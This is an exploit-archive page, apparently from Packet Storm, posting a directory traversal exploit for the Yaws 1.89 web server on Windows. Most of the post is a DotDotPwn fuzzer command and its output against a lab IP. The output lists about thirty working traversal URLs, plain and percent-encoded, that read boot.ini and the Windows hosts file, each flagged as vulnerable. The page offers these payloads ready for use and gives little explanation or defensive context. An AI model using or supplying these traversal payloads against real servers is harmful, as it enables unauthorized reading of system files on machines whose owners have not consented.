exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Yaws 1.89 Directory Traversal

Yaws 1.89 Directory Traversal
Posted Nov 2, 2010
Authored by nitr0us

Yaws version 1.89 suffers from directory traversal vulnerabilities.

tags | exploit, vulnerability, file inclusion
SHA-256 | 422ffd9928f2e9d3b034af951782e1779777b7f67b219e7d1e79832e022c92f0

Yaws 1.89 Directory Traversal

Change Mirror Download
# Exploit Title: Yaws 1.89 Directory Traversal
# Date: 29 Oct
# Author: nitr0us (Alejandro Hernandez H.)
# Software Link: http://yaws.hyber.org/download/Yaws-1.89-windows-installer.exe
# Version: 1.89
# Tested on: Windows XP Service Pack 2

Chatsubo [(in)Security Dark] Labs
http://chatsubo-labs.blogspot.com
http://www.brainoverflow.org

EXPLOIT:
************************************************************************************
******* Released @ BugCon Security Conferences 2010 - http://www.bugcon.org ********
************************************************************************************

nitr0us@daiquiri ~ #./dotdotpwn.pl -m http -h 192.168.242.128 -O -s -d 3 -t 100 -q
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v2.1 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################


[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.242.128
[+] Detecting Operating System (nmap) ...
[+] Operating System detected: Microsoft Windows XP SP2 or Windows Server 2003 SP0/SP1
[+] Protocol: http
[+] Port: 80
[+] Service detected:
Yaws/1.89 Yet Another Web Server
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 3 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (windows)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 2328

[=========== TESTING RESULTS ============]
[+] Ready to launch 10.00 traversals per second
[+] Press any key to start the testing (You can stop it pressing Ctrl + C)

[*] Testing Path: http://192.168.242.128:80/..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\..\..\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..%5c..%5c..%5cboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e\%2e%2e\%2e%2e\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\..\\..\\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\..\\..\\windows\\system32\\drivers\\etc\\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\\..\\\..\\\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\\..\\\..\\\windows\\\system32\\\drivers\\\etc\\\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/..\/..\/boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/..\/..\/windows\/system32\/drivers\/etc\/hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/\..\/\..\/\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/\..\/\..\/\windows\/\system32\/\drivers\/\etc\/\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\../\../\../boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\../\../\../windows/\system32/\drivers/\etc/\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80//..\/..\/..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80//..\/..\/..\windows\/system32\/drivers\/etc\/hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\..\.\..\.\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\..\.\..\.\..\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\\..\\.\\..\\.\\..\\windows\\system32\\drivers\\etc\\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80////..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80////..\..\..\windows///system32///drivers///etc///hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\\\..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\\\..\..\..\windows\\\system32\\\drivers\\\etc\\\hosts <- VULNERABLE!

[+] Fuzz testing finished after 10.68 minutes (641 seconds)
[+] Total Traversals found: 30

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close